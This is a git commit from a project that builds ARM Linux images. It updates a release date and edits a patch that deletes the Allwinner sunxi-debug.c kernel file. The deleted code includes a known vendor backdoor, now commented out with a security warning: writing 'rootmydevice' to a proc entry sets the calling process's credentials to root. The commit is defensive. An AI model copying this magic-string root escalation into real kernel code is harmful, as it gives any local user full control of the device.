Patch update due to merge, logbook - updated some images

This commit is contained in:
Igor Pecovnik 2016-06-05 08:42:25 +02:00
parent 19320cfc39
commit d45ad4af79
2 changed files with 13 additions and 4 deletions

View File

@ -1,7 +1,7 @@
# Release history
**v5.14 / 1.6.2016**
**v5.14 / 5.6.2016**
- Odroid C2 and Banana M2+ images rebuilt
- fixed eMMC installer, updated images and repository for Opi PC Plus and Opi Plus 2E
**v5.12 / 31.5.2016**

View File

@ -16,7 +16,7 @@ deleted file mode 100755
index 53ed9fc..0000000
--- a/arch/arm/mach-sunxi/sunxi-debug.c
+++ /dev/null
@@ -1,94 +0,0 @@
@@ -1,103 +0,0 @@
-/*
- * Sunxi_debug.c
- *
@ -56,7 +56,15 @@ index 53ed9fc..0000000
- kfree(buf);
- return -EFAULT;
- }
-
-
- /*
-
- COMMENTED! THIS CODE ALLOWS FOR PRIVILEGE ESCALATION!
-
- http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/
-
- Note: This entire file should probably be removed
-
- if(!strncmp("rootmydevice",(char*)buf,12)){
- cred = (struct cred *)__task_cred(current);
- cred->uid = 0;
@ -69,6 +77,7 @@ index 53ed9fc..0000000
- cred->fsgid = 0;
- printk("now you are root\n");
- }
- */
-
- kfree(buf);
- return count;